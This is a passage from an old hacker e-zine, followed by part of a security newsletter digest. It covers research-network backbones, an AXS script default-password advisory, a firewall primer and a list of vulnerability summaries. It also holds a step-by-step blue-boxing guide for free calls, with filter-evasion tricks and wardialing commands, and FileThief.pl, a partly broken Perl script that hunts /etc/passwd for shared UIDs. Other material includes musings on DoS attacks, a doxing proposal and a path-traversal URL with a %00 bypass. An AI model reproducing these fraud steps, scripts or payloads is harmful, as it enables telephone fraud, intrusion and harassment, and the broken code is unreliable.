causes less strain on a network then does RSVP. For this reason, it is the preferred method. However, DiffServ doesn't guarantee the connection as well and as tight as RSVP does. So there are trade offs. DiffServ works buy labeling packets with "per-hop behaviors" (PHB's). PHB's basically define the level of service that this packet will need. The PHB is initially defined on the edge routers (closest to the sending device). End devices on the network have the job of reshaping traffic as it leaves the domain, taking into account any burst traffic that may occur. DiffServ assures a basic throughput but allows for bursts when resource availability permits (depending on the PHB type assigned to the packet). All the information needed for DiffServ is held in the DS-field in the IP headers. In all likely hood we will not be implementing DiffServ on our home, or small networks or even large ones for that matter. It will be the responsibility of your BB (Bandwidth Broker, also know as your ISP) to provide DiffServ where needed. It will be the BB's job of aggregating all of their DiffServ traffic into one stream before it is sent out of the network and onto another. Last thing: DiffServ, unlike RSVP, has no built in support for Multicasting. For purposing of testing QoS methods the QBONE initiative was created in 1998. The QBONE is a joint effort of academic, governmental and corporate researchers and engineers. Created as a wide area testbed for QoS protocols. It crosses both NGI and i2 borders operating through almost all of the advanced networks in the US and abroad (such as vBNS, Abilene, ESNet, CA*NET, which are discussed later). For more details on the QBONE and QoS try http://www.internet2.edu/qbone/. > IP Multicasting Let's say that both you and I live in the same city and use the same Internet provider. Lets also say that we are both listening to a live stream (if they one day do live) of Geeks in Space (www.the-sync.com/geeks) at the exact same time. This means that the same datagrams are coming to the same network, the same POP, at the same time, like so: _____ ____ |Geeks|----Stream1-----|our |-------- Me | in | |Lame| |Space|----Stream2-----|ISP |-------- You ----- ---- It would certainly be to the entire Internets advantage and ours if we could combine those two streams into one, creating less congestion on the network. IP Multicasting reefers to doing exactly that. Example: _____ ____ |Geeks| |our |-------- Me | in |----Stream------|Lame| |Space| |ISP |-------- You ----- ---- In the above example there is only one stream of datagrams going out over the internet but once it gets to our ISP it splits the stream into two and sends Geeks In Space to you and I at the same time. In order to do this it creates "Multicasting Groups" for each stream (both you and I being in the same group). It also requires smart routers which can replicate streams and keep track of and create these groups, dynamically adding users when needed. Also, the routers all along the way from the Real Audio server to our ISP must support IP multicast protocols such as DVMRP (Distance Vector Multicast Routing Protocol), PIM (Protocol Independent Multicast) or MOSPF (Multicast Open Shortest Path First). To use IP multicasting today you must connect to an existing network within the public Internet known as the MBONE (at least, that is where all the action is at). Before you can do that, however, your ISP must support Multicasting. Check with them to see if they do, else, switch ISP's. For more information about the MBONE and IP multicasting check out www.mbone.com. For even more info on multicasting try www.ncne.nlanr.net/faq/multicast.html II. NGI and i2 ------------------------------------------------------------------------ Like I said before, the NGI and i2 initiatives are almost identical. They operate on, mostly, the same networks and backbones. They have pretty much the same goals. However, there are a few things that make them different, other than who is in control of each initiative and the budget that they have. The following takes a look at each initiative. > NGI In the NGI there are a few different Government organizations that are involved in making the goals of NGI a reality. Those organization are DARPA (Defense Advanced Research Projects Agency), NSF (National Science Foundation), NASA (National Aeronautics and Space Administration), NIST (National Institute of Standards and Technology), NLM (National Library of Medicine) and the DoE (Department of Energy). Each of these organizations have different responsibilities, some overlapping in areas. Each of these organizations have their own physical networks that they can test things out on (some of which are discussed later). I'm not going to discuss the specifics of what their jobs are, if you want more information go to: www.ngi.gov NGI project budget for 1998 was $80 million US Dollars. 1999 is $110 million. 2000 will be $110 million. The project was only granted 3 years of funding by Congress but planned up till 2002 (I guess the budget comes later). There is a possibility that it could be extended even father, however. There are number of very specific goals for NGI: To develop a NGI testbed that supports end-to-end QoS for new networking technologies and advanced research. This testbed will connect at least 100 NGI sites - universities, Federal research institutions, and other research partners - at speeds 100 times faster than today's Internet (OC-3 - 155mbps), and will connect 10 sites at speeds 1,000 times faster than the current Internet (OC-48 - 2.5gbps). Another goal of the NGI is to demonstrate Terabit switching technology by 2002. At the NGI/i2 conference I went to there was a professor from Hebrew University Israel who gave a lecture on an Optical Terabit switch that he had developed and tested. The switch could do well over 1tbps with hop rates of 10ms. That certainly grabbed the attention of the NSF guys at the conference. The device is supposed to go into production sometime in two years, as I remember. The NGI network is spread out over several different networks. The ones that I know of are: vBNS (run by NSF), Abilene (run by UCAID), ESNet (run by DoE) and NREN (run by NASA). In order for a corporation or University to hook up to NGI they must connect to one of these backbones. In many cases we see where the requesting peer will just connect to a GigaPOP which is already connected to one of the backbone NAP's. Then they must arrange (with the NSF I believe) to be added to the NGI registrar and routing tables. In many cases, the organization or university can get government funding from the NSF. > i2 Internet2 is an advanced network initiative by UCAID (University Corporation for Advanced Internet Development) and several other corporations. The budget is about $80 million a year. i2, like NGI, is spread out over various high speed backbones in the US. The two major ones are vBNS and Abilene, which will be discussed later. In most cases Universities will connect to GigaPOPs which intern connect to one of the i2 backbones. I2, like NGI, is involved with implementing and developing QoS, IPv6 and advanced network applications. There isno real literature on the net that discusses the goals of i2. The talk is more around the backbones that it operates on. III. Advanced high speed backbones ------------------------------------------------------------------------ As I said before, both i2 and NGI run over serveral high speed backbone networks. The follow discusses a few of them in detail. > vBNS The NSF initiated the very high speed Backbone Network Service (vBNS) in 1995. With help from MCI the NSF setup a high speed backbone across the US. The purpose was to connect Government, Industry and Universities to 5 SCC's (Super Computing Centers) in the US and then, inevitable, to each other. For those interested, those 5 SCC's are: - Cornell Theory Center - National Center for Atmospheric Research - Pittsburgh Supercomputer Center - National Center for Supercomputer Applications - San Diego Supercomputer Center The vBNS serves as a backbone for both the NGI and i2 initiatives. The vBNS uses IP over ATM over SONET. It operates at speeds up to OC-48 (2.5gbps). MCI also created a second "testnet" network for testing experimental technologies until they prove stable for implementation on the vBNS. Most Peers connect at DS3 and OC-3 speeds to one of the vBNS NAP's (Network Access Points) or to a GigaPOP that is already plugged up to a NAP. The vBNS supports both Native and Tunneled IPv6. > Abilene The Abilene network was created by UCAID in collaboration with Qwuest Communications, Cisco, Nortel Networks and a few other that I don't remember. Created for the sole purpose of connecting i2 peers. Operates at speeds up to OC-48 using IP over SONET. As I remember, the lines were laid and POP's put in place by Qwuest Communications. If you want to connect to the Abilene backbone all you need is $110k a year for a OC-3 connection, $320k a year for a OC-12. Small price to pay :] > ESNet ESNet (Energy Science Network) headed by the DoE (department of Energy) provides for speeds up to OC-12. Connects directly to the vBNS, STARTAP and many other high speed US backbones. Peers connect anywhere from 64k up to OC-12 speeds. Been around for a while and has allot of networks connected to it. For more information check out: www.es.net > International networks It was 1997 that the NSF starting taking proposals from other R&D networks in other countries to add International peers to its registrar for the vBNS. I guess the US GOV and academic establishments realized that the US wasn't exactly the smartest country on the planet. The International peers connect through the STARTAP and connect from there to other i2 or NGI peers. STARTAP (Science, Technology, And Research Transit Access Point) is the International NAP for most US networks (other than the Internet). The STARTAP connects directly to the Ameritech NAP in Chicago which connects to the vBNS and many other high speed US networks. The STARTAP is funded by the NSF and maintained by the University of Illinois at Chicago and a few other Chicago based groups. The STARTAP currently supports speeds up to OC-12 and supports DiffServ, RSVP, Multicasting and IPv6. For more information on the STARTAP check out: www.startap.net The following are just a few examples of International networks are hooking up to i2 or NGI through the STARTAP. >> Israel's tap The Israeli government has committed $10 million a year for the next four years towards advanced network development in Israel. The group in charge of all i2 and NGI activities is the IUCC (Israel Inter-University Computation Center) whose main members are the eight major universities in Israel. This is where it will start, with the Universities, and then shortly after it should be open to commercial R&D departments. There is one Satellite link at 44mbps from Israel (Tel Aviv University) to the STARTAP in Chicago US. Israel bought the entire spectrum on the sat so there are plans for upgrading that speed anywhere from 60mbps to 140mbps, as needed. There is also a fiber optic E3 (34mbps) line from Israel (Bar Ilan U. I believe) to the UK where it connects to the QUANTUM network in Europe (http://www.dante.net/quantum). After that there is another fiber optic line going from the connection point in the UK over to the US at 10mbps for redundancy. I've heard rumors of a 2gbps line being setup from the US to Israel but I have not been able to confirm this. Though the i2 website for the IUCC claims full support for QoS, I don't believe it. At an i2/NGI conference I went to I asked one of the IUCC speakers about this and he gave no real assurances for QoS support, quite the opposite. For more information on the i2 project in Israel go to www.internet-2.org.il >> CA*NET3 CA*NET3 currently runs at OC-48 (2.5gbps). The Canadian government in partner with some High Tech companies funds the project. NAP's to the backbone are located all along the southern border of Canada and connects to other US networks through the STARTAP. The Canadian Government has committed $53 million to the project which will last a year or so (don't remember the exacts). The project was initiated in 1998. CA*NET3 uses DWDM (Dense Wavelength Division Multiplexing) to get to OC-48. CANARIE (Canadian Network for the Advancement of Research, Industry and Education) is the group in charge of the project and for more info check out their site at: www.canarie.ca or www.canet3.net. The CANARIE consortium includes commercial, academic and governmental departments of Canada. IV. Security concerns ------------------------------------------------------------------------ There are a couple of security concerns as I see it. The first is about the way most universities and organizations make requests to plug up to i2 or NGI. They create a proposal and many will list, in great detail, the details of their network. One sad sight I saw was the San Diego Supercomputer Center which posted a map of all the IP NetID's for its network. Even worse was CANARIE which posted the same thing (the NetID's) for the entire CA*NET3 backbone. Now, these are private networks. However, all I would need, in theory, is a terminal at a i2 or NGI peer to start playing around. It seams even easier when I start to really look at their proposals. Most peers make the default path their NGI or i2 connection when the destination is another i2 or NGI peer, even for something as simple as a webpage. So, depending on how it is implemented I may be able to just start from a simple Student terminal, as opposed to having to hack into the Systems group terminals or servers first. The second is concerning DoS attacks. Give me bandwidth and I'm in DoS heaven :) On a i2 or NGI peer's network I may have allot of bandwidth at my disposal (depending on what type of policy they come under when connecting to i2 or NGI backbones). Then, if I find a peer stupid enough with a proxy from there to the normal Internet, who knows. And I'm only a nominal security buff, I imagine that there are allot more concerns that I haven't seen. There is, however, a IETF Security Workgroup in place for this exact reason. So, who knows? If you have any questions, comments, corrections... e-mail me at: mindmore@mindless.com I will try to post any technical corrections in the next issue of this e-zine. - Cyphunk ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ------------------------------------------------+ | ------------------------------------- | AXS Script Makes WebServer Vulnerable | ------------------------------------- | | --- by f0bic - [ linux security ] | --- f0bic@deadprotocol.org | (this article was also published on BugTraq) | ________ | [_______________________________________| ----------------- Brief Description ----------------- The AXS webserver script by Fluid Dynamics(www.xav.com) allows unauthorized third party users to make use of the ax-admin Administration/Configuration module and remotely edit and/or delete log files and overwriting files on the system. System resources compromization might also be one of the effects of this vulnerability. -------------------- Vulnerable Platforms -------------------- Any operating system AXS is compatible with. - *NIX Operating Systems (AXS cgi set) - WindowsNT Operating System (AXS perl set) I have seen the AXS ( cgi set ) operate on Apache 1.2.6/1.3.3, NCSA, Netscape-Commerce. ( perl set ) operate on IIS 3.0/4.0, Netscape-Fasttrack. ------------------------- Vulnerability Description ------------------------- The AXS Script, which is a cgi or perl script that keeps track of the number, the source locations, the clientinfo of visitors to your http port(80). It writes this data to an output file, named log.txt by default (but it can easily be relocated). This log.txt is normally located in the cgi-bin directory of the server, allowing write access to this directory. The AXS cgi script contains two .cgi appended files; ax.cgi and ax-admin.cgi respectively. The ax.cgi file is the one that actually "grabs" the info about the visitors and then writes them to log.txt (or wherever you relocated this too). The ax-admin.cgi is the the configuration file for the ax.cgi script. The ax-admin.cgi is default passworded by "IronMan" and sometimes is even left blank. Due to this weak access security it is very easy to gain "configuration access" to the ax.cgi script, allowing you to reconfigure it, delete the log files, change the location of the logs. The default location for the AXS script is http://www.server.com/cgi-bin/ax.cgi. The default location for the AXS Admin script is http://www.server.com/cgi-bin/ax-admin.cgi. To obtain access to the ax-admin.cgi module by default you get a password screen issued, Ironman being the default password. The password is determined by the characters in the $password="*" field of the ax-admin.cgi hardcode ("*" being a the default/chosen password or a blank). Most of the time I have seen the password field to be left blank or defaulted. If the password is left blank you will not be prompted for a login screen, instead it will automatically drop you into the ax-admin configuration page. From this point on you can alter files on the server system, possibly resulting in Denial-of-Service attacks against the system's resources. --------- Solutions --------- The AXS problems relate to a lack of resources that could suffice for secure business applications. The AXS script on the other hand has been developed for ease of use, not for trouble of security; this is one of the mistakes that Fluid Dynamics has made. The easy way is not to run with none or default password on the ax-admin.cgi module. I have informed Fluid Dynamics about the fact that I have seen servers where the ax-admin password was the same as the one for a valid shell account on that system. Fluid Dynamics has also gone trough no trouble at all to encrypt any of the passwords used in the ax-admin verification. EOF ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' +--------------------------+ | PURSUiT presentation, | | | | Boxing in the UK | | | | By Oktal | | | | | +--------------------------+ Part 1. Blue Boxing Part 2 will be on Beige Boxing and will be in the issue 3 of PURSUiT Blue boxing is sending noises down a fone line to sieze the trunk and make free fone calls (among other things). The trunk is where operators dial from. But they don't use the same frequencies as home fones, so we need to get the tones from your soundcard to the fone line. What you will need for this hobby: 1 Computer + Sound card 1 Tone-generating software (eg. http://x-iz.net/gbh/bluebeep.zip) 1 Cheap telephone (I use the old 'Viscount' series by BT because I have a friend who has loads he doesn't want) 4 Wires (at least 1 metre each) 2 2.5mm jack plugs (from your local electrical shop) 1 Hole-making equipment (hammer+nail) 1 Soldering iron + solder (optional) What you must do for this hobby: Open up the handset so you can see all the insides. There should be a speaker and a microphone, each with 2 wires connecting into them. Attach (or solder) one of your 4 wires to each of the wires in the handset. Now make a hole in the casing for the wires to emerge from. Open up the jack plugs and attach the 2 wires from the speaker to the connections in one plug and and 2 wires from the mic to the connections in the other plug. Use solder if you want. Stick the handset back together. Disconnect the speakers and microphone from your computer and plug the earpiece into the microphone socket and the mouthpiece into the speaker socket. -OR- If you have electrical knowledge, you could make a box that generates the tones by its self and doesn't need connection to a soundcard. A long time ago, BT had a tone (2280hz) which was used by BT engineers to access cirtain funtions within the trunk. Phreakers discovered that this could be abused to sieze the trunk and make free calls out of it. But BT got wise to the phreakers so now blue boxing is impossible in the UK. But BT does have 'country direct' lines which are freefone 0800 numbers to overseas. They are mostly in the 0800 890 XXX range along with some other useful numbers. These countries' exchanges are not as modern as here and they are blue boxable. (NB: not all country direct lines are boxable) Some country direct numbers to countries with CCITT-5 lines: South Africa 0800 890 027 Germany 0800 890 049 Brazil 0800 890 055 Chilie 0800 890 056 Libia 0800 890 059 Australia 0800 890 061 Indonesia 0800 890 062 French 0800 890 133 Bahamas 0800 890 135 Gabon 0800 890 241 etc etc etc You can then make an international call out of that country to the UK (or any other country) and make a free call. Using Bluebeep by Onkel Dittmeyer: The 'action mode' sucks so you should program a script to play the tones. A sample (and very good) script that I made is included in the zip file (http://x-iz.net/gbh/bluebeep.zip) To make your own script to your own needs, read 'Script Language' from the Info|Documentation menu. To run a script, type BLUEBEEP /EXEC FILENAME.EXT from the prompt. For a list of all the command-line switches, type BLUEBEEP /? Tone specifications for the CCITT-5 exchange: Description Frequency (Hz) Duration (ms) Pause after tone (ms) digit 1 700 & 900 60 40 digit 2 700 & 1100 60 40 digit 3 900 & 1100 60 40 digit 4 700 & 1300 60 40 digit 5 900 & 1300 60 40 digit 6 1100 & 1300 60 40 digit 7 700 & 1500 60 40 digit 8 900 & 1500 60 40 digit 9 1100 & 1500 60 40 digit 0 1300 & 1500 60 40 KP1 1100 & 1700 80 40 KP2 1300 & 1700 80 40 ST 1500 & 1700 80 80 Clear Ahead Tone 2400 & 2600 150 30 Seize Tone 2600 & 2600 80 20 Be aware that duration times may differ slightly with the exchange. To sieze the trunk of a CCITT-5 line: 1. You will hear a bleep after you dial the country direct number 2. Send the clear ahead tone after that bleep (makes it think you've hung up) 3. Then Send the sieze tone (so it thinks it's talking to the telco equipment) 4. You will hear a bleep and a chunk 5. Dial the number as shown: KP2+Zero+CountryCode+AreaCode+Number+ST eg. KP2,0441818118181,ST But BT often put filters on the country direct lines to filter out these tones. Here are some tricks to get past a lot of filters: The average tone of a conversation is around 3000 Hz. This is called 'pink noise'. Bluebeep allows 3 simultaneous tones, so add 3000 Hz to the last frequency of each tone in the dial set list. Some filters raise or lower the pitch of the sound slightly. Try tones just above or just below the given frequencies. (eg. 2395 or 2405 instead of 2400) You may have to do some freqency analysis on the echo you get from the system. A good tool for this is Wintone (30-day trial version at www.steaksandwich.com, registration $20 (Ł13), or you could read my article on cracking software, which will be coming soon in PURSUiT) That's it guys. Any information you may have on UK boxing can be sent to ms@punkass.com for a great big essay i have planned for the mag next year on UK boxing. Remember part 2 of this article (beige boxing) is in issue 2. Wardialling & Scanning If a country direct number is abused too much then BT is forced to shut it down :( So every so often the one you use will go away and you'll have to use another. Well, the list above is by no means complete. And there are other very useful numbers in the 0800 890 XXX range, so... Why not find out what they all are? "What, scan 1000 numbers???" No... you get a wardialler to do that for you. It dials them all up (don't do this all at once, BT'll notice) and when you come back it'll tell you which ones picked up and which ones didn't exist. (it might also tell you if it was a data or voice line) Then you can dial the ones that look interesting. You just tell it what range to scan and leave it for a while. You could also be at your deak while the dialler is running so you can listen to them and take note of what the voice ones are, like "voice: "Mark at reception how may I help you?" A good wardialler is ToneLoc at http://x-iz.net/gbh/toneloc.zip Example ToneLoc Syntax: C:\> TONELOC OUTPUT.TXT /M:0800890XXX /R:000-999 /S:3:00a /E:4:00a will dial 0800890000, 0800890001, 0800890002... 0800890999 starting at 3 am and ending at 4 am (regardless of how far thru the scan it has got) C:\> TONELOC OUTPUT.TXT /M:0800890XXX /R:000-999 /H:1:00 will scan the range starting NOW and ending in one hour Toneloc also has some cool options like Black Book; A txt file of numbers to NEVER dial (eg. 999) during a scan and loads of other cool stuff. To setup options like that and config stuff like modem strings, run TLCFG.EXE A really neat trick is the Scan Map. I can't explain it, it is just so great. Run TONEMAP SAMPLE.DAT to see what I mean. EOF ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' *-------------------------------* | PURSUiT is proud to present.. | | | | Introduction to Firewalls | | | | By deadline | *-------------------------------* What is a firewall? --------------------- A firewall is a system or group of systems that enforces an access control policy between two networks. The actual means by which this happens varies widely, but in principle, the firewall can be thought of as a pair of mechanisms, one that is there to block traffic, and the other which permits traffic. Some firewalls place a greater emphasis on only blocking traffic, while others are strictly for permitting traffic. Diagram: O = Outside Host 1: packets to the firewall F = Firewall/Router 2: firewall accepts or denys I = Internal Network 3: packets go to host (3) IIII |-----IIII (2) | (1) FFFFF-| (3) OOOO-------FFFFF-------IIII OOOO FFFFF-| IIII | (3) |-----IIII IIII Protection -------------- Firewalls offer protection against many kinds of things. They offer protection from malicious packets, e-mail spam/bombs, and also, intruders to your system. But their is also attacks Firewalls CANNOT protect u against (attacks that dont go threw the firewall) like people from inside the network, and from there, that user can give access to outside networks, which can be potentionally dangerous to your network. And lastly, Firewalls cant protect against tunneling over application protocols to trojaned or poorly written clients. Types of Firewalls -------------------- 1: Network Layer ------------------ Network firewalls usually make there desicions based on address (source) and the ports of a packet. Routers are probably the most known network level firewall, because its not able to make a great decision about where the packet is actually going or where it came from. Newer network firewalls have increased greatly in maintaining information about the packets that pass threw them, contents of data streams, and other sources of information. A imporant thing to remember is that network firewalls route traffic directly threw them, so to use one you usually need to have a validly assigned IP address block. Network firewalls usually are fast and transparent to users. 2: Application Layer ---------------------- Application level firewalls are usually a host running proxy servers. The proxy server usually permit no traffic directly between networks and give a more detailed log of traffic then the Network level firewalls. These firewalls can be used as network address translators, since packets go "in one side and out the other", after passing threw a application that effectivly masks the origin of the initiating connection. Proxy Servers --------------- A proxy server is a application that mediates traffic between a protected network and the Internet, meaning it only allows specific connections to connect to the host, and allows only connections out of the host threw specified ports. Proxys are usually used instead of router based traffic controls, because they prevent traffic from passing directly between two network. Alot of proxys have more logging and support for the user authentication. Because proxys must understand the application protocol being used, they can also implement protocol specific security, where as only certin prototcols are allowed to be incoming and outgoing from a host. Firewall Downsides -------------------- Firewalls while restricting access from outside attacks. Also restricts users inside the network to connect to some/maybe even all networks outside the current one. This means, a user in the secure network, may not be able to connect to lets say www.linux.org unless he has the permissions to. This also is the same for ftp, telnet, and other various network utilities. EOF ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ]--------------------------------[ [ FileThief.pl ] ]--------------------------------[ [ Developed By ] ]--------------------------------[ [ Mister-X (Admin@x-iz.net) ] [ Alkatraz (funnet@icom-web.com) ] ]--------------------------------[ For those of you who cant tell what this script does by looking at the source code. It scans /etc/passwd for users with the same UID as your own. If it finds them it reports to STDOUT and log to a file, for later browsing. Yes, it is a common occurance for slack admins to add users with the same UID meaning that you have full access to their files. PERL Script Follows: #!/usr/bin/perl ($myusr, undef, $id, undef, undef, undef, undef, $hdir, undef) = getpwnam(getlogin); $fid = time."-$id"; print "Welcome to filethief - searching for $id in /etc/passwd.\n"; $myusr = getlogin; $found = 0; open(logf, ">>$hdir/filethief-$fid.log"); open(pwd, ") { local($usr, undef, $uid, undef) = split(/:/, $_, 4); if(($uid eq $id) && ($usr ne $myusr)) { $found++; print logf "$usr has the same ID as $myusr ($id).\n"; } } close(pwd); if($found eq 0) { print logf "\nNo matches were found at ".localtime(time)."\n"; } else { print logf "Found [$found] matches at ".localtime(time)."\n"; } close(logf); open(logf, "<$hdir/filethief-$fid.log"); while() { print; } close(logf); exit(1); EOF ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' iuuiuuiu uiuiu uiu i I I iu uiu yi BI BI iu uiu i yi I BI iu ui yi yi BI uiuuiuui y yi yi BI iuu yi yi iyi BIB iu yi yiyi BI BI BI iu yi yi BIBIBI BI uiu [ PURSUiT News Update ] Well after all, that's the first issue of PURSUiT, so we have no news to talk about, so we will use this space for ideas, future features and other things. Stuff we had on mind: --------------------- 1. Lamer list This was the idea of one of us, just to take out rage on people that keep on bugging us, or just for the fun of it. If we will include it in the future, I belive it won't be serious, just to have some laughs the night after it on IRC ;) 2. Shouts It's my idea mostly, though I think it won't be included. If it will, we will probably use it to thank people who helped putting out the zine, reviewed it, made some corrections etc. 3. Docs exposing Now this idea came through an anonymous source, which suggested that PURSUiT could drop docs of a few people here and then. The people we had on mind are mostly the ones that everyone hates, (I won't declare them here :) but we first need to get the docs, so it might not go. 4. Questions\Answers section This is mostly self explained, a section or column, where people will be able to email us and we will answer the question over the zine, so that other people could know the answer too. If we will get enough response for that, we might do it. That's it for now, if you have other suggestions, ideas, or features you belive we should include just email us to: bxj - f0bic - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSU iT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PUR SUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][P ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' Well, we all hope you enjoyed the first issue of PURSUiT. Remember, you can always catch us on IRC, or email us. EOF @HWA 115.0 SecurityFocus.com Newsletter 33 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SecurityFocus.com, the premier security information portal, has a completely new look and more in-depth security content! As part of our new site we have a free service which allows Solaris users determine their security posture take a look at: http://www.securityfocus.com/sun/vulncalc SecurityFocus.com - It's all here and it's all free. I. FRONT AND CENTER 1. Info.Sec.Radio to interview head of Technical Security Branch of Canada's Federal Police Force, the RCMP. II. BUGTRAQ SUMMARY 1. Linux atsar Input Validation Vulnerability 2. RealServer Internal IP Address Disclosure Vulnerability 3. NT Automated Tasks / Drive Mappings Vulnerability 4. Atrium Software Mercur Mail Server 3.2 Buffer Overflow Vulnerability 5. Sojourn File Access Vulnerability 6. Oracle Web Listener Batch File Vulnerability 7. Checkpoint Firewall-1 Internal Address Leakage Vulnerability 8. Microsoft SQL Weak Password Encryption Vulnerability 9. Atrium Software Mercur WebView WebMail-Client Buffer Overflow Vulnerability 10. Trend Micro OfficeScan Unauthenticated CGI Usage Vulnerability III. SECURITYFOCUS.COM TOP 6 NEWS ARTICLESS 1. The Coming Linux Plague (March 13, 2000) 2. The Fine Print in UCITA (March 16, 2000) 3. Sex Site Billing Companies Targeted By Russian Cybercrime (March 13, 2000) 4. Information Freedom Catching On (March 16, 2000) 5. Vast online credit card theft revealed (March 17, 2000) 6. Hacker Finds a New Home for Stolen Cards (March 17, 2000) IV. INCIDENTS SUMMARY 1. Munged Napster Sessions (Thread) 2. Undernet/telnet attempts? (Thread) 3. Strange RPC? service entries. (Thread) 4. ingreslock message (Thread) 5. lots of interest in port 109 (POP2) (Thread) 6. Mail and web server attack (Thread) 7. Firewall (Thread) 8. TCP port 3218 (Thread) 9. Odd UPD scan (Thread) 10. DUP packet replies at tvguide.com (Thread) 11. Cracked; rootkit - entrapment question? (Thread) 12. pop-2 scanning (Thread) 13. Looking for Squid Proxies (Thread) 14. TCP port 3218 (Thread) 15. what are these? (Thread) V. VULN-DEV RESEARCH LIST SUMMARY 1. Unwanted automagic processing (Thread) 2. MS Frontpage shtml.dll Path Leak Vulnerability (Thread) 3. Hotline (Thread) 4. Crashing Win9x (Thread) 5. NT 4.0 (Workstation) Logon Authentication Vulnerability (Thread) 6. Crashing Win9x with smbclient (Thread) 7. Intel Corporation, Express 550 (Thread) 8. spoofing the ethernet address (Thread) 9. Linux Mandrake 6.1 PAM/userhelper exploit (Thread) 10. Exploiting any network protocol with secondary data channels (Thread) 11. Buffer overflow in AIM 3.5.1856 (Thread) VI. SECURITY JOBS VII. SECURITY SURVEY RESULTS 1. Which remote accessing service presents the greatest security risks? VIII. SECURITY FOCUS TOP 6 TOOLS 1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT) 2. SecurityFocus.com Pager (Win95/98/NT) 3. Cold Fusion Scan 1.0 (Win95/98/NT) 4. Atlas 1.0 (Win95/98) 5. kfirewall 0.4.2 (Linux) 6. cgi scanner 3.6 (UNIX/PERL) IX. SPONSOR INFORMATION - SecurityFocus.com X. SUBSCRIBE/UNSUBSCRIBE INFORMATION I. FRONT AND CENTER ------------------- 1. Info.Sec.Radio to interview head of Technical Security Branch of Canada's Federal Police Force, the RCMP The show airs on Monday March 20 at 10am PST, 11am MST, 1pm EST. http://www.securityfocus.com/radio/ II. BUGTRAQ SUMMARY 2000-03-13 to 2000-03-20 --------------------------------------------- 1. Linux atsar Input Validation Vulnerability BugTraq ID: 1048 Remote: No Date Published: 2000-03-11 Relevant URL: http://www.securityfocus.com/bid/1048 Summary: atsar is a linux load monitoring software package released under the GPL by AT Computing. atsadc is a setuid root binary that is included in the atsar package. atsadc will accept as an argument an output file, which it will open -- without checking to make sure the user executing atsadc has the priviliges to do so. After it has opened and created (or overwritten) the target file as root, the permissions set on the file will allow the attacker to write to it. Since this file is arbitrary, it is possible to gain root locally in any number of ways through creating malicious system files. In Teso's proof of concept exploit, root priviliges are gained by creating a malicious shared library to be preloaded and creating/specifying that library in /etc/ld.so.preload (and then executing a setuid binary..). 2. RealServer Internal IP Address Disclosure Vulnerability BugTraq ID: 1049 Remote: Yes Date Published: 2000-03-08 Relevant URL: http://www.securityfocus.com/bid/1049 Summary: By default, Real Server includes the IP address of the server in data sent to the client. If the Real Server is installed on a machine in a NAT environment, (where requests from the outside network are handled by reverse proxy), this will reveal what are supposed to be private, hidden IP addresses. 3. NT Automated Tasks / Drive Mappings Vulnerability BugTraq ID: 1050 Remote: No Date Published: 2000-03-14 Relevant URL: http://www.securityfocus.com/bid/1050 Summary: Any automated task that relies on mapped drives and runs at a higher privelege level than the logged-on user can be exploited by changing the drive mapping. By replicating the directory structure of the intended drive, and replacing the contents of the scheduled executables or configuration files with other data, it is possible for a local attacker to cause arbitrary code to be executed at an elevated privelege level. For example: \\Workstation has the following drive mapping: S: \\Server\Scripts and there is an AT job that runs S:\Daily.bat every day as the Local Administrator. Now all the attacker has to do is replace the S: mapping with one that specifies a target where the attacker has write privileges (\\Workstation\C$ for example). Then if the batch file C:\Daily.bat is created, it will be run as Local Administrator. 4. Atrium Software Mercur Mail Server 3.2 Buffer Overflow Vulnerability BugTraq ID: 1051 Remote: Yes Date Published: 2000-03-14 Relevant URL: http://www.securityfocus.com/bid/1051 Summary: Atrium Software Mercur is a SMTP, POP3, and IMAP mail server. Insufficient boundary checking exists within the login command, causing the application to crash if a string consisting of over 3000 characters is used as a username. This affects both the POP3 and IMAP server in the Mercur mail server suite. 5. Sojourn File Access Vulnerability BugTraq ID: 1052 Remote: Yes Date Published: 2000-03-14 Relevant URL: http://www.securityfocus.com/bid/1052 Summary: Any file that the webserver has read access to can be read on a server running the Sojourn search engine. The Sojourn software includes the ability to organize a website into categories. These categories can then be accessed via the sojourn.cgi Perl script. This is done by making a request for a URL like: http ://target/cgi-bin/sojourn.cgi?cat=categoryname Each category has an associated .txt file based on the category name. The program appends the .txt extension onto the contents of the 'cat' variable. However, the program will accept and follow the '../' string in the variable contents, allowing read access to any .txt file the webserver can read. This restriction can be bypassed by appending %00 to the end of the requested file, which will prevent the .txt extension from being used in the filename. 